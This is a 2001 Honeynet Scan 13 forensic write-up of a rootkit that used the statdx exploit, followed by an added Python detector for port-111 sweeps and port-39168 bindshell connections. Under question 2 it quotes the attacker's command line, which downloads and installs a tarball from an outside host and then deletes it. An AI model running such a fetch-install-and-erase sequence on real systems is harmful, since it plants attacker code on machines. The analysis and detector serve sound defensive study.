Analysis of Honeynet.org Scan 13
Paul Telford
March 21, 2001

1. What is the blackhat attempting to do with his command line syntax?

He first attempts to change directories. We have insufficient data to determine whether this was successful, as the directories he tries are non-standard. Next, he downloads and unpacks a root-kit tarball, changes into the directory it has just created, and begins to run the cracking tool it provides. From the key capture and analysis of the provided source code, we can see that he is attempting to scan the following subnets:

216.210.*
200.120.*
64.120.*
216.200.*
200.120.*
63.1.*
216.10.*
210.120.*
64.1.*
216.1.*
194.1.*
216.1.*
210.128.*
24.1.*
12.20.*

2. What does the tool accomplish?

The tool scans the specified subnets for hosts that are listening on port 111 (statd). It is hard-coded to try the "Redhat 6.2 (nfs-utils-0.1.6-2)" vulnerability. Any hosts that match this criterion are then attacked using a well-known statd vulnerability. If the host is vulnerable, a process is started that listens on port 39168 for connections; any subsequent connection to this port spawns a root shell (/bin/sh). Once the port is available, the root-kit uses it to run the following sequence of commands:

cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz ; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz

3. How does the tool work?

This tool uses the statdx exploit originally posted to BugTraq by ron1n in Aug. 2000. It is a format-string exploit.

4. Is this tool a worm, or would you classify it as something else?

This tool does automatically download and install a program on the remote system, but it is unclear what the purpose of that program is. It is almost certainly not another copy of the statd exploit, so we cannot classify this as a true self-replicating worm.

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

It is based on the statdx exploit posted to BugTraq by ron1n. It is modified (as noted in the source) to run the wget/tar commands seen above. The original exploit ran only:

cd /; ls -alF; id

It also includes the luckscan-a port scanner, of unknown origin, and the luckgo shell script.
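The behaviour described in question 2 (a sweep of port 111 across whole subnets, followed by a connection to port 39168 on any host that fell to the exploit) leaves a distinctive pattern in network flow logs. The following is an added detection example written for this analysis; it is not code from the Scan 13 submission or from the tool itself. It reads constructed flow records in an assumed "epoch src dst dport" format, flags any source that contacts many distinct hosts on port 111 inside a short window, flags every connection to 39168, and reports hosts that were both swept and then contacted on the bindshell port as likely compromised. The threshold and window values are assumptions chosen for the sample data.

```python
"""Detect the statd sweep / port-39168 bindshell pattern from the Scan 13 analysis.

Added example, not part of the original write-up. Input records are constructed
flow lines of the assumed form:  <epoch seconds> <src ip> <dst ip> <dst port>
"""
from collections import defaultdict

STATD_SWEEP_PORT = 111      # port probed by the scanner, as stated in the analysis
BINDSHELL_PORT = 39168      # port on which the exploited statd offers a root shell
SWEEP_THRESHOLD = 5         # distinct targets on 111 before we call it a sweep (assumed)
SWEEP_WINDOW = 60           # seconds within which those targets must be hit (assumed)

# Constructed sample: one attacker sweeps seven hosts on 111, then connects to
# port 39168 on one of them; a second host generates unrelated web traffic.
SAMPLE_FLOWS = """
1000 10.0.0.5 10.1.0.1 111
1001 10.0.0.5 10.1.0.2 111
1002 10.0.0.5 10.1.0.3 111
1003 10.0.0.5 10.1.0.4 111
1004 10.0.0.5 10.1.0.5 111
1005 10.0.0.5 10.1.0.6 111
1006 10.0.0.5 10.1.0.7 111
1007 10.0.0.9 10.1.0.1 80
1010 10.0.0.5 10.1.0.3 39168
"""


def parse_flow(line):
    """Split one flow record into (timestamp, src, dst, dport)."""
    ts, src, dst, dport = line.split()
    return int(ts), src, dst, int(dport)


def find_sweeps(flows, threshold=SWEEP_THRESHOLD, window=SWEEP_WINDOW):
    """Return {src: set(dst)} for sources that touch >= threshold distinct
    hosts on port 111 within any `window`-second span."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport == STATD_SWEEP_PORT:
            by_src[src].append((ts, dst))

    sweeps = {}
    for src, hits in by_src.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # slide the window start forward until it fits within `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            targets = {dst for _, dst in hits[start:end + 1]}
            if len(targets) >= threshold:
                sweeps[src] = sweeps.get(src, set()) | targets
    return sweeps


def find_bindshell_connections(flows):
    """Every connection to the bindshell port, regardless of source."""
    return [(ts, src, dst) for ts, src, dst, dport in flows if dport == BINDSHELL_PORT]


def analyse(text):
    """Run both detectors over raw flow text and correlate the results."""
    flows = [parse_flow(line) for line in text.splitlines() if line.strip()]
    sweeps = find_sweeps(flows)
    shells = find_bindshell_connections(flows)

    # A bindshell connection to a host that was just swept on 111 is the
    # footprint of a successful statdx run; report those hosts separately.
    swept_hosts = set().union(*sweeps.values())
    compromised = sorted({dst for _, _, dst in shells if dst in swept_hosts})
    return {
        "sweep_sources": sorted(sweeps),
        "bindshell": shells,
        "likely_compromised": compromised,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_FLOWS).items():
        print(f"{key}: {value}")
```

Against real data the thresholds would be tuned to the site, and the 39168 check should be treated as a high-confidence indicator on its own, since the write-up gives no legitimate use for that port.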